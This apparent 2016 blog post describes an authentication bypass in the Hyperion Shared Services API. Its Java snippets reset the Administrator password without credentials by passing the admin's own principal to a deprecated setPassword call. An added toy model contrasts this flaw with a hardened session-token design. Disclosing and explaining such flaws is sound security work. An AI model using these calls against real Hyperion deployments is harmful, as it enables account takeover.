Friday, January 22, 2016

Backdoor in Hyperion CSSAPI or how to change Administrator password

        Some words about security in CSSAPI

The Shared Services API allows a user to work with the Users and Groups directory and to change security settings. Simply look at CSSDirectoryManagementAPIIF: it has plenty of functions that you can use for integration projects and security.
You may ask: what do I need to get access to the CSSDirectoryManagementAPIIF?
Answer: nothing special.


Map context = new HashMap();
CSSSystem system = CSSSystem.getInstance();
CSSAPIIF cssApi = system.getCSSAPI();
CSSDirectoryManagementAPIIF cssDirectory  = cssApi.getDirectoryManagementAPI(context);

That is all; no authentication is required.
But compare versions 9.3 and 9.5 of the CSSAPI. All methods in the 9.5 API require a new parameter, CSSPrincipalIF, which identifies the user requesting information and cannot be null.
For example:

getUsers(java.util.Map context,CSSPrincipalIF principal,java.lang.String userName)

The old methods from the CSSAPI are deprecated.
Let's try to get admin access without identifying ourselves. The old functions are deprecated, but we can still call them.
This method returns a user by login. At the end we simply need to check the array length and set a new password:


if (userArr.length == 1)
    cssDirectory.setPassword(context, userArr[0].getPrincipal(),
        userArr[0].getPrincipal().getIdentity(), "newpassword");


As you can see, we use the setPassword method. It requires a non-null CSSPrincipalIF to identify the requester, but we passed the admin user's own Principal instead =) And we successfully changed the password for the admin user without any authentication!
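The weakness described above, as an added toy model next to a hardened variant (example code written for this page, not Oracle's or the post author's code): the caller supplies the requester identity as a plain object instead of the server deriving it from an authenticated session. All class and method names are hypothetical, the rule that a user may change their own password is an assumption of the model, and it needs Java 16 or later.

```java
import java.util.*;

// Toy model with hypothetical names; not CSSAPI code or internals.
public class PrincipalBindingDemo {
    record Principal(String identity) {}

    static class Directory {
        // Plaintext passwords only to keep the model short.
        private final Map<String, String> passwords = new HashMap<>(Map.of("admin", "s3cret"));
        private final Map<String, String> sessions = new HashMap<>(); // token -> login

        // Lookup needs no credentials, as with the deprecated calls above.
        Principal lookup(String login) {
            return passwords.containsKey(login) ? new Principal(login) : null;
        }

        // Weak: the requester is whatever non-null principal the caller hands in.
        boolean setPasswordWeak(Principal requester, String target, String newPw) {
            if (requester == null || !requester.identity().equals(target)) return false;
            passwords.put(target, newPw);
            return true;
        }

        // Hardened: a session token is issued only after the password is verified.
        Optional<String> authenticate(String login, String pw) {
            if (pw == null || !pw.equals(passwords.get(login))) return Optional.empty();
            String token = UUID.randomUUID().toString();
            sessions.put(token, login);
            return Optional.of(token);
        }

        // Hardened: the requester identity is resolved server-side from the token.
        boolean setPassword(String token, String target, String newPw) {
            String requester = sessions.get(token);
            if (requester == null || !requester.equals(target)) return false;
            passwords.put(target, newPw);
            return true;
        }
    }

    public static void main(String[] args) {
        Directory dir = new Directory();
        Principal looked = dir.lookup("admin"); // no password presented
        System.out.println("weak, looked-up principal: " + dir.setPasswordWeak(looked, "admin", "changed"));
        System.out.println("hardened, made-up token:   " + dir.setPassword("not-a-session", "admin", "x"));
        String token = dir.authenticate("admin", "changed").orElseThrow();
        System.out.println("hardened, real session:    " + dir.setPassword(token, "admin", "rotated"));
    }
}
```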

Summary

Obviously, this is a security issue, but it is not easy to exploit, because you need to obtain the reg.properties file with the database access configuration. Hyperion EPM is also a system for private networks, so external security is not the first priority for its developers.


P.S. I tested these methods on Hyperion EPM 11.1.2.3.+, 11.1.2.4

